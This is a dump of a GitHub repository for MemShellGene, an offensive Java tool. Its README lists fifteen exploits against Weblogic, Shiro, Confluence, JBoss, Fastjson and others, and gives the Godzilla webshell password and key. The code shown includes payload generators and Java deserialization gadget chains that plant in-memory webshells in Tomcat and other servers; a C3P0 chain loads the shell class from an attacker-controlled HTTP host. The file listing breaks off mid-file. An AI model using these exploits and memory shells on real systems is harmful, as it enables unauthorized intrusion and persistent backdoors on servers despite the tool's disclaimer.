├── .gitignore ├── README.md ├── lib ├── coherence-1.0.0.jar ├── coherence-rest-1.0.0.jar ├── coherence-web-1.0.0.jar ├── com.oracle.core.coherence.integration-1.0.0.jar ├── commons-beanutils-1.8.3.jar ├── javafx-swt.jar ├── javafx.base.jar ├── javafx.controls.jar ├── javafx.fxml.jar ├── javafx.graphics.jar ├── javafx.media.jar ├── javafx.swing.jar ├── javafx.web.jar ├── jsafeFIPS-1.0.jar ├── permit-reflect-0.3.jar ├── resin-1.0.0.jar └── wlcipher-1.0.0.jar ├── pom.xml └── src └── main ├── java ├── META-INF │ └── MANIFEST.MF ├── config │ └── Config.java ├── core │ ├── GenerateMemShell.java │ ├── GeneratePayload.java │ ├── enumtypes │ │ ├── GadgetType.java │ │ └── PayloadType.java │ ├── gadgets │ │ ├── C3P0.java │ │ ├── CommonsBeanutils1.java │ │ ├── CommonsBeanutils1_183.java │ │ ├── CommonsBeanutilsAttrCompare.java │ │ ├── CommonsBeanutilsAttrCompare_183.java │ │ ├── CommonsBeanutilsObjectToStringComparator.java │ │ ├── CommonsBeanutilsObjectToStringComparator_183.java │ │ ├── CommonsBeanutilsPropertySource.java │ │ ├── CommonsBeanutilsPropertySource_183.java │ │ ├── CommonsBeanutilsString.java │ │ ├── CommonsBeanutilsString_183.java │ │ ├── CommonsBeanutilsString_192s.java │ │ ├── CommonsCollections5.java │ │ ├── CommonsCollections6.java │ │ ├── CommonsCollectionsK1.java │ │ ├── CommonsCollectionsK2.java │ │ ├── Jdk7u21.java │ │ ├── Spring1.java │ │ └── utils │ │ │ ├── ClassFiles.java │ │ │ ├── Gadgets.java │ │ │ ├── JavassistClassLoader.java │ │ │ ├── Reflections.java │ │ │ └── Util.java │ ├── memshell │ │ ├── CommandMemShell.java │ │ ├── FastJsonFilterMemShell.java │ │ ├── FastJsonListenerMemShell.java │ │ ├── GlassFishFilterMemShell.java │ │ ├── GlassFishListenerMemShell.java │ │ ├── JBossFilterMemShell.java │ │ ├── JBossListenerMemShell.java │ │ ├── JettyFilterMemShell.java │ │ ├── JettyListenerMemShell.java │ │ ├── NettyHandlerMemShell.java │ │ ├── ResinFilterMemShell.java │ │ ├── ResinListenerMemShell.java │ │ ├── ShiroMemShell.java │ │ ├── SpringBootMemShell.java │ │ ├── SpringControllerMemShell.java │ │ ├── SpringInterceptorMemShell.java │ │ ├── SpringWebfluxHandlerMemShell.java │ │ ├── TomcatFilterMemShell.java │ │ ├── TomcatListenerMemShell.java │ │ ├── TongWebFilterMemShell.java │ │ ├── TongWebListenerMemShell.java │ │ ├── WebSphereFilterMemShell.java │ │ ├── WeblogicFilterMemShell.java │ │ ├── WeblogicFilterMemShell_CVE_2020_14756.java │ │ ├── WeblogicListenerMemShell.java │ │ └── WeblogicListenerMemShell_CVE_2020_14756.java │ ├── memshellstr │ │ └── ConstantTemplate.java │ ├── payloads │ │ ├── Confluence_CVE_2021_26084.java │ │ ├── Confluence_CVE_2022_26134.java │ │ ├── ECology_BeanShell_RCE.java │ │ ├── Fastjson_AutoType_ByPass.java │ │ ├── Seeyon_Unauthorized_RCE.java │ │ ├── SpringGateWay_CVE_2022_22947.java │ │ ├── Weblogic_0Day_JDK7.java │ │ ├── Weblogic_CVE_2020_14756.java │ │ ├── Weblogic_CVE_2020_14883.java │ │ └── Weblogic_CVE_2020_2883.java │ └── utils │ │ ├── Cache.java │ │ ├── Compiler.java │ │ ├── Config.java │ │ ├── MemMap.java │ │ ├── MyURLClassLoader.java │ │ └── Util.java ├── exp │ ├── AttackBase.java │ ├── BaseExp.java │ ├── Run.java │ ├── confluence │ │ ├── Confluence_CVE_2021_26084.java │ │ └── Confluence_CVE_2022_26134.java │ ├── ecology │ │ └── ECology_BeanShell_RCE.java │ ├── fastjson │ │ └── Fastjson_AutoType_ByPass.java │ ├── jboss │ │ ├── JBoss_CVE_2017_12149.java │ │ └── JBoss_CVE_2017_7504.java │ ├── seeyon │ │ └── Seeyon_Unauthorized_RCE.java │ ├── shiro │ │ └── Shiro_550.java │ ├── springgateway │ │ └── SpringGateWay_CVE_2022_22947.java │ └── weblogic │ │ ├── Weblogic_0Day_1.java │ │ ├── Weblogic_CVE_2020_14756.java │ │ ├── Weblogic_CVE_2020_14883.java │ │ └── Weblogic_CVE_2020_2883.java ├── ui │ ├── ComponentType.java │ ├── Config.java │ ├── Controller.java │ └── Main.java └── utils │ ├── MessagePrintBase.java │ ├── SystemInfo.java │ ├── SystemPrintMessage.java │ ├── TextAreaPrintMessage.java │ ├── Transformers.java │ ├── UserAgentUtil.java │ ├── Util.java │ ├── okhttplib │ ├── OkHttp.java │ ├── OkHttpProxyInterceptor.java │ ├── ProxyConfig.java │ ├── ProxySSLSocketFactory.java │ ├── ProxySocketFactory.java │ ├── ThreadLocalProxyAuthenticator.java │ └── TyrRequestBody.java │ └── weblogic │ ├── IIOPProtocolOperation.java │ ├── T3ProtocolOperation.java │ └── WeblogicGadget.java └── resources ├── META-INF └── MANIFEST.MF ├── data └── shiro_keys.txt ├── rmi.fxml └── sample.fxml /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | target/ 3 | output/ 4 | *.class 5 | 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MemShellGene 2 | 3 | ## 运行环境 4 | 已在下列JDK版本进行测试: 5 | 6 | 1. JDK 1.6.0_45 7 | 2. JDK 1.8.0_101 8 | 3. JDK 1.8.0_181 9 | 4. JDK 1.8.0_271 10 | 5. OpenJDK 11 11 | 12 | ## 启动 13 | java -jar MemShellGene.jar 14 | 15 | ## 简介 16 | ### Attack模块 17 | 18 | ![attack](https://github.com/suizhibo/MemShellGene/assets/28916595/6021410e-6020-47a7-84b2-ea63442b55f4) 19 | 20 | 21 | 22 | 23 | 24 | 该模式下提供如下15个EXP 25 | | EXP | 26 | |--------| 27 | |Shiro_550| 28 | |Weblogic_CVE_2020_14756| 29 | |Weblogic_CVE_2020_2883| 30 | |Weblogic_0Day_1| 31 | |Weblogic_CVE_2020_14883| 32 | |FastJson_AutoType_ByPass| 33 | |TongWeb| 34 | |Landray_BeabShell_RCE| 35 | |JBoss_CVE_2017_12149| 36 | |JBoss_CVE_2017_7504| 37 | |Confluence_CVE_2022_26134| 38 | |Confluence_CVE_2021_26084| 39 | |ECology_BeanShell_RCE| 40 | |Seeyon_Unauthorized_RCE| 41 | |SpringGateWay_CVE_2022_22947| 42 | 43 | 44 | ### Generate模块 45 | ![generate](https://github.com/suizhibo/MemShellGene/assets/28916595/d789f3fd-589e-48b3-aa4f-4f6580b977f0) 46 | 47 | 48 | 49 | 该模块涉及到Java的动态编译,需要正确配置java classpath,并确认该目录下的lib目录包含tools.jar。 50 | 使用该模块可以快速生成内存马的BASE64或者BCEL字符串。 51 | 52 | ![1111111111](https://github.com/suizhibo/MemShellGene/assets/28916595/ddfcc2a9-dd20-4175-8485-2139e79bb600) 53 | 54 | 55 | 56 | #### 内存马版本测试 57 | 58 | ![image](https://github.com/suizhibo/MemShellGene/assets/28916595/92452286-d0e0-41d7-8baf-9dd7ae62d7d8) 59 | 60 | 61 | 62 | 63 | 64 | #### 验证须知 65 | 1. Header:X-Requested-With: XmlHTTPRequest 66 | 2. 访问触发路径,若response返回的Success,说明内存马注入成功 67 | 68 | 69 | #### 上线哥斯拉须知: 70 | 71 | 1. 密码: pAS3 72 | 73 | 2. 秘钥: key 74 | 75 | 3. Header:X-Requested-With: XMLHTTPRequest 76 | 77 | ![图片1](https://github.com/suizhibo/MemShellGene/assets/28916595/e6d8a13b-b0f7-4562-84a0-af57e774beb5) 78 | 79 | # 友情连接 80 | 内存马查杀 [MemShellKiller](https://github.com/suizhibo/MemShellKiller) 81 | 82 | # 免责声明 83 | 1. 娱乐用途优先:本工具设计的初衷是为了教育、研究和娱乐目的。它可以帮助您了解网络安全的基础知识,提升您的技能,以及在合法范围内进行测试。 84 | 85 | 2. 请勿非法使用:请记住,未经授权对他人的系统、网络或设备进行渗透测试是违法的。我们强烈建议并恳求您不要使用本工具进行任何非法活动。否则,后果自负(并且可能会有法律追究哦)。 86 | 87 | 3. 合法授权:请确保您仅在获得明确授权的情况下使用本工具进行渗透测试。这包括但不限于:您自己的设备和网络,或明确授权您进行测试的第三方。 88 | 89 | 4. 知识与责任并重:网络安全是一项崇高的事业,保护网络安全是每一个网络安全爱好者的责任。使用本工具进行合法的测试和研究,帮助提升整体网络安全水平,这才是我们共同的目标。 90 | 91 | 5. 技术支持有限:本工具提供“按现状”提供,我们不对其适用性或可能造成的任何损失负责。使用本工具之前,请确保您已充分了解其功能和潜在影响。 92 | 93 | 6. 玩得开心,但要有节制:我们希望您在使用本工具时能获得乐趣并学到新知识,但请务必保持理智和克制。不要因为一时兴起而越界,记住,网络冒险有时也是需要勇气的撤退。 94 | 95 | 最后提醒 96 | 当您点击下载或使用本工具时,即表示您已阅读并同意以上所有条款。请戴好您的虚拟防护帽,系紧您的安全带,准备好迎接一场合法且富有教育意义的网络冒险吧! 97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /lib/coherence-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/coherence-1.0.0.jar -------------------------------------------------------------------------------- /lib/coherence-rest-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/coherence-rest-1.0.0.jar -------------------------------------------------------------------------------- /lib/coherence-web-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/coherence-web-1.0.0.jar -------------------------------------------------------------------------------- /lib/com.oracle.core.coherence.integration-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/com.oracle.core.coherence.integration-1.0.0.jar -------------------------------------------------------------------------------- /lib/commons-beanutils-1.8.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/commons-beanutils-1.8.3.jar -------------------------------------------------------------------------------- /lib/javafx-swt.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx-swt.jar -------------------------------------------------------------------------------- /lib/javafx.base.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.base.jar -------------------------------------------------------------------------------- /lib/javafx.controls.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.controls.jar -------------------------------------------------------------------------------- /lib/javafx.fxml.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.fxml.jar -------------------------------------------------------------------------------- /lib/javafx.graphics.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.graphics.jar -------------------------------------------------------------------------------- /lib/javafx.media.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.media.jar -------------------------------------------------------------------------------- /lib/javafx.swing.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.swing.jar -------------------------------------------------------------------------------- /lib/javafx.web.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.web.jar -------------------------------------------------------------------------------- /lib/jsafeFIPS-1.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/jsafeFIPS-1.0.jar -------------------------------------------------------------------------------- /lib/permit-reflect-0.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/permit-reflect-0.3.jar -------------------------------------------------------------------------------- /lib/resin-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/resin-1.0.0.jar -------------------------------------------------------------------------------- /lib/wlcipher-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/wlcipher-1.0.0.jar -------------------------------------------------------------------------------- /src/main/java/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: core.GeneratePayload 3 | 4 | -------------------------------------------------------------------------------- /src/main/java/core/GenerateMemShell.java: -------------------------------------------------------------------------------- 1 | package core; 2 | 3 | import core.memshellstr.ConstantTemplate; 4 | import core.utils.Compiler; 5 | import utils.Util; 6 | 7 | import java.lang.reflect.Field; 8 | import java.util.ArrayList; 9 | import java.util.HashMap; 10 | import java.util.List; 11 | import java.util.Map; 12 | 13 | public class GenerateMemShell { 14 | public static Map> shellCodeMapper = new HashMap>(); 15 | public static Map> optionsMapper = new HashMap>(); 16 | 17 | static { 18 | List options = new ArrayList(); 19 | options.add("-source"); 20 | options.add("1.8"); 21 | options.add("-target"); 22 | options.add("1.8"); 23 | optionsMapper.put("8", options); 24 | 25 | List options2 = new ArrayList(); 26 | options2.add("-source"); 27 | options2.add("1.7"); 28 | options2.add("-target"); 29 | options2.add("1.7"); 30 | optionsMapper.put("7", options2); 31 | 32 | List options3 = new ArrayList(); 33 | options3.add("-source"); 34 | options3.add("1.6"); 35 | options3.add("-target"); 36 | options3.add("1.6"); 37 | optionsMapper.put("6", options3); 38 | } 39 | 40 | 41 | public static void main(String[] args) { 42 | 43 | } 44 | 45 | public static String generateMemShell(String memName, String encodeType, String version) { 46 | Field constantName = null; 47 | String memShellString = ""; 48 | String encodeString = ""; 49 | Map shellcode = null; 50 | byte[] codeByte = new byte[0]; 51 | shellcode = shellCodeMapper.get(memName); 52 | if (shellcode != null && !shellcode.isEmpty()) { 53 | codeByte = shellcode.get(version); 54 | } 55 | if(codeByte == null || codeByte.length == 0){ 56 | try { 57 | Map tmp = new HashMap(); 58 | constantName = ConstantTemplate.class.getDeclaredField(memName); 59 | memShellString = (String) constantName.get(new ConstantTemplate()); 60 | shellcode = Compiler.createMemShell(memName, memShellString, optionsMapper.get(version)); 61 | codeByte = shellcode.get(memName); 62 | tmp.put(version, codeByte); 63 | shellCodeMapper.put(memName, tmp); 64 | } catch (Exception e) { 65 | e.printStackTrace(); 66 | } 67 | } 68 | try { 69 | if ("BASE64".equals(encodeType)) { 70 | encodeString = Util.base64Encode(codeByte); 71 | 72 | } else if ("BCEL".equals(encodeType)) { 73 | encodeString = Util.generateBcelCode2(codeByte); 74 | } 75 | } catch (Exception e) { 76 | e.printStackTrace(); 77 | } 78 | return encodeString; 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /src/main/java/core/GeneratePayload.java: -------------------------------------------------------------------------------- 1 | package core; 2 | 3 | import java.lang.reflect.InvocationTargetException; 4 | import java.lang.reflect.Method; 5 | 6 | import core.enumtypes.GadgetType; 7 | import core.enumtypes.PayloadType; 8 | import org.apache.commons.cli.*; 9 | 10 | 11 | public class GeneratePayload { 12 | 13 | 14 | public static Object generatePayload(String gadGetType, String payloadType, String trojanType) throws ClassNotFoundException, 15 | NoSuchMethodException, InvocationTargetException, IllegalAccessException { 16 | Object payload = null; 17 | PayloadType payloadType1 = null; 18 | boolean flag = false; 19 | 20 | // for (GadgetType gt : GadgetType.values()) { 21 | // if (gadGetType.toLowerCase().equals(String.valueOf(gt))) { 22 | // flag = true; 23 | // break; 24 | // } 25 | // } 26 | // if (!flag) { 27 | // System.out.println("Not support gadGetType: " + gadGetType); 28 | // return payload; 29 | // } 30 | 31 | 32 | for (PayloadType pt : PayloadType.values()) { 33 | if (payloadType.toLowerCase().equals(String.valueOf(pt))) { 34 | payloadType1 = pt; 35 | break; 36 | } 37 | } 38 | if (!payloadType.contains("dnslog.cn") && payloadType1 == null) { 39 | System.out.println("Not support payloadType: " + payloadType); 40 | return payload; 41 | } 42 | 43 | Class clazz = null; 44 | try { 45 | String classPath = String.format("core.gadgets.%s", new Object[]{gadGetType}); 46 | clazz = Class.forName(classPath); 47 | }catch (ClassNotFoundException e){ 48 | String classPath = String.format("core.payloads.%s", new Object[]{gadGetType}); 49 | clazz = Class.forName(classPath); 50 | } 51 | 52 | Method method = clazz.getMethod("getObject", PayloadType.class, String.class); 53 | payload = (Object) method.invoke(clazz, payloadType1, trojanType); 54 | return payload; 55 | } 56 | 57 | public static byte[] generatePayloadByte(String gadGetType, String payloadType, String trojanType) throws ClassNotFoundException, 58 | NoSuchMethodException, InvocationTargetException, IllegalAccessException { 59 | byte[] payload = null; 60 | PayloadType payloadType1 = null; 61 | boolean flag = false; 62 | 63 | // for (GadgetType gt : GadgetType.values()) { 64 | // if (gadGetType.toLowerCase().equals(String.valueOf(gt))) { 65 | // flag = true; 66 | // break; 67 | // } 68 | // } 69 | // if (!flag) { 70 | // System.out.println("Not support gadGetType: " + gadGetType); 71 | // return payload; 72 | // } 73 | 74 | for (PayloadType pt : PayloadType.values()) { 75 | if (payloadType.toLowerCase().equals(String.valueOf(pt))) { 76 | payloadType1 = pt; 77 | break; 78 | } 79 | } 80 | if (!payloadType.contains("dnslog.cn") && payloadType1 == null) { 81 | System.out.println("Not support payloadType: " + payloadType); 82 | return payload; 83 | } 84 | 85 | Class clazz = null; 86 | try { 87 | String classPath = String.format("core.gadgets.%s", new Object[]{gadGetType}); 88 | clazz = Class.forName(classPath); 89 | }catch (ClassNotFoundException e){ 90 | String classPath = String.format("core.payloads.%s", new Object[]{gadGetType}); 91 | clazz = Class.forName(classPath); 92 | } 93 | Method method = clazz.getMethod("getByte", PayloadType.class, String.class); 94 | payload = (byte[]) method.invoke(clazz, payloadType1, trojanType); 95 | return payload; 96 | } 97 | 98 | public static void main(String[] args) throws ParseException { 99 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true"); 100 | CommandLineParser parser = new BasicParser(); 101 | Options options = new Options(); 102 | options.addOption("g", "gadGetType", true, ""); 103 | options.addOption("p", "payloadType", true, ""); 104 | options.addOption("t", "trojanType", true, ""); 105 | 106 | CommandLine commandLine = parser.parse(options, args); 107 | String gadGetType = commandLine.getOptionValue("g"); 108 | String payloadType = commandLine.getOptionValue("p"); 109 | String trojanType = commandLine.getOptionValue("t"); 110 | try { 111 | byte[] payload = generatePayloadByte(gadGetType, payloadType, trojanType); 112 | if (payload.length >1){ 113 | System.out.print(utils.Util.base64Encode(payload)); 114 | } 115 | } catch (ClassNotFoundException e) { 116 | e.printStackTrace(); 117 | } catch (NoSuchMethodException e) { 118 | e.printStackTrace(); 119 | } catch (InvocationTargetException e) { 120 | e.printStackTrace(); 121 | } catch (IllegalAccessException e) { 122 | e.printStackTrace(); 123 | } catch (Exception e) { 124 | e.printStackTrace(); 125 | } 126 | } 127 | } 128 | -------------------------------------------------------------------------------- /src/main/java/core/enumtypes/GadgetType.java: -------------------------------------------------------------------------------- 1 | package core.enumtypes; 2 | 3 | public enum GadgetType { 4 | commonsbeanutils1, 5 | commonsbeanutils2, 6 | commonscollectionsk1, 7 | commonscollectionsk2, 8 | commonscollections5, 9 | cve_2020_2883, 10 | cve_2020_14756_2, 11 | weblogic_0day_1, 12 | weblogic_day_1_jdk7, 13 | cve_2020_14883, 14 | fastjson, 15 | cve_2021_26084, 16 | ecology_rce, 17 | tyr_2021_00028, 18 | cve_2022_22947 19 | 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/core/enumtypes/PayloadType.java: -------------------------------------------------------------------------------- 1 | package core.enumtypes; 2 | 3 | public enum PayloadType { 4 | tongweblistenermemshell, 5 | glassfishlistenermemshell, 6 | fastjsonlistenermemshell, 7 | tongwebfiltermemshell, 8 | glassfishfiltermemshell, 9 | fastjsonfiltermemshell, 10 | tomcatlistenermemshell, 11 | tomcatfiltermemshell, 12 | springbootmemshell, 13 | jbossfiltermemshell, 14 | jbosslistenermemshell, 15 | shiromemshell, 16 | weblogiclistenermemshell_cve_2020_14756, 17 | weblogicfiltermemshell_cve_2020_14756, 18 | none, 19 | command, 20 | resinlistenermemshell, 21 | resinfiltermemshell, 22 | commandmemshell, 23 | weblogiclistenermemshell, 24 | jettylistenermemshell, 25 | jettyfiltermemshell, 26 | weblogicfiltermemshell, 27 | weblogicmemshell_cve_2020_14883, 28 | springwebfluxhandlermemshell, 29 | nettyhandlermemshell 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/C3P0.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import com.mchange.v2.c3p0.PoolBackedDataSource; 4 | import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase; 5 | import core.enumtypes.PayloadType; 6 | import core.memshell.TomcatFilterMemShell; 7 | import core.memshell.TomcatListenerMemShell; 8 | import core.utils.Config; 9 | 10 | import javax.naming.NamingException; 11 | import javax.naming.Reference; 12 | import javax.naming.Referenceable; 13 | import javax.sql.ConnectionPoolDataSource; 14 | import javax.sql.PooledConnection; 15 | import java.io.ByteArrayOutputStream; 16 | import java.io.ObjectOutputStream; 17 | import java.io.PrintWriter; 18 | import java.lang.reflect.Field; 19 | import java.sql.SQLException; 20 | import java.sql.SQLFeatureNotSupportedException; 21 | import java.util.logging.Logger; 22 | 23 | 24 | public class C3P0 { 25 | public static byte[] getBytes(PayloadType type, String... param) throws Exception { 26 | 27 | String className; 28 | switch (type){ 29 | case tomcatfiltermemshell: 30 | className = TomcatFilterMemShell.class.getName(); 31 | break; 32 | case tomcatlistenermemshell: 33 | className = TomcatListenerMemShell.class.getName(); 34 | break; 35 | default: 36 | throw new IllegalStateException("Unexpected value: " + type); 37 | } 38 | 39 | PoolBackedDataSource b = PoolBackedDataSource.class.newInstance(); 40 | Field field = PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource"); 41 | field.setAccessible(true); 42 | field.set(b, new PoolSource(className,"http://" + Config.ip + ":" + Config.httpPort + "/")); 43 | 44 | //序列化 45 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 46 | ObjectOutputStream oos = new ObjectOutputStream(baous); 47 | oos.writeObject(b); 48 | byte[] bytes = baous.toByteArray(); 49 | oos.close(); 50 | 51 | return bytes; 52 | } 53 | 54 | 55 | private static final class PoolSource implements ConnectionPoolDataSource, Referenceable { 56 | 57 | private String className; 58 | private String url; 59 | 60 | public PoolSource ( String className, String url ) { 61 | this.className = className; 62 | this.url = url; 63 | } 64 | 65 | public Reference getReference () throws NamingException { 66 | return new Reference("exploit", this.className, this.url); 67 | } 68 | 69 | public PrintWriter getLogWriter () throws SQLException {return null;} 70 | public void setLogWriter ( PrintWriter out ) throws SQLException {} 71 | public void setLoginTimeout ( int seconds ) throws SQLException {} 72 | public int getLoginTimeout () throws SQLException {return 0;} 73 | public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;} 74 | public PooledConnection getPooledConnection () throws SQLException {return null;} 75 | public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;} 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutils1.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import java.math.BigInteger; 4 | import java.util.Comparator; 5 | import java.util.PriorityQueue; 6 | 7 | import core.enumtypes.PayloadType; 8 | import core.gadgets.utils.Gadgets; 9 | import core.gadgets.utils.Reflections; 10 | import core.utils.MyURLClassLoader; 11 | import core.utils.Util; 12 | import org.apache.commons.beanutils.BeanComparator; 13 | 14 | public class CommonsBeanutils1 { 15 | 16 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 17 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 18 | // mock method name until armed 19 | BeanComparator beanComparator = new BeanComparator("lowestSetBit"); 20 | PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator); 21 | 22 | queue.add(new BigInteger("1")); 23 | queue.add(new BigInteger("1")); 24 | 25 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 26 | 27 | 28 | Object[] queueArray = (Object[])Reflections.getFieldValue(queue, "queue"); 29 | queueArray[0] = templates; 30 | queueArray[1] = templates; 31 | 32 | return queue; 33 | 34 | } 35 | 36 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 37 | Object queue = getObject(type, trojanType); 38 | return Util.serialize(queue); 39 | 40 | 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutils1_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | 13 | import java.math.BigInteger; 14 | import java.util.Comparator; 15 | import java.util.PriorityQueue; 16 | 17 | public class CommonsBeanutils1_183 { 18 | 19 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 20 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 21 | 22 | // 修改BeanComparator类的serialVersionUID 23 | ClassPool pool = ClassPool.getDefault(); 24 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 25 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 26 | try { 27 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 28 | ctBeanComparator.removeField(ctSUID); 29 | }catch (javassist.NotFoundException e){} 30 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 31 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 32 | ctBeanComparator.defrost(); 33 | Reflections.setFieldValue(beanComparator, "property", "lowestSetBit"); 34 | 35 | PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator); 36 | 37 | queue.add(new BigInteger("1")); 38 | queue.add(new BigInteger("1")); 39 | 40 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 41 | 42 | Object[] queueArray = (Object[])Reflections.getFieldValue(queue, "queue"); 43 | queueArray[0] = templates; 44 | queueArray[1] = templates; 45 | 46 | return queue; 47 | } 48 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 49 | Object val = getObject(type, trojanType); 50 | return Util.serialize(val); 51 | } 52 | } 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsAttrCompare.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import com.sun.org.apache.xerces.internal.dom.AttrNSImpl; 4 | import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl; 5 | import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare; 6 | import core.enumtypes.PayloadType; 7 | import core.gadgets.utils.Gadgets; 8 | import core.gadgets.utils.Reflections; 9 | import core.utils.Util; 10 | import org.apache.commons.beanutils.BeanComparator; 11 | 12 | import java.util.PriorityQueue; 13 | import java.util.Queue; 14 | 15 | 16 | public class CommonsBeanutilsAttrCompare { 17 | 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object template = Gadgets.createTemplatesImpl(type, trojanType); 20 | 21 | AttrNSImpl attrNS1 = new AttrNSImpl(); 22 | CoreDocumentImpl coreDocument = new CoreDocumentImpl(); 23 | attrNS1.setValues(coreDocument,"1","1","1"); 24 | 25 | BeanComparator beanComparator = new BeanComparator(null, new AttrCompare()); 26 | 27 | PriorityQueue queue = new PriorityQueue(2, beanComparator); 28 | 29 | 30 | queue.add(attrNS1); 31 | queue.add(attrNS1); 32 | 33 | 34 | Reflections.setFieldValue(queue, "queue", new Object[] { template, template }); 35 | 36 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 37 | 38 | return (Queue)queue; 39 | } 40 | 41 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 42 | Object val = getObject(type, trojanType); 43 | return Util.serialize(val); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsAttrCompare_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import com.sun.org.apache.xerces.internal.dom.AttrNSImpl; 4 | import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl; 5 | import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare; 6 | import core.enumtypes.PayloadType; 7 | import core.gadgets.utils.Gadgets; 8 | import core.gadgets.utils.JavassistClassLoader; 9 | import core.gadgets.utils.Reflections; 10 | import core.utils.Util; 11 | import javassist.ClassClassPath; 12 | import javassist.ClassPool; 13 | import javassist.CtClass; 14 | import javassist.CtField; 15 | 16 | import java.util.Comparator; 17 | import java.util.PriorityQueue; 18 | import java.util.Queue; 19 | 20 | 21 | public class CommonsBeanutilsAttrCompare_183 { 22 | 23 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 24 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 25 | 26 | AttrNSImpl attrNS1 = new AttrNSImpl(); 27 | CoreDocumentImpl coreDocument = new CoreDocumentImpl(); 28 | 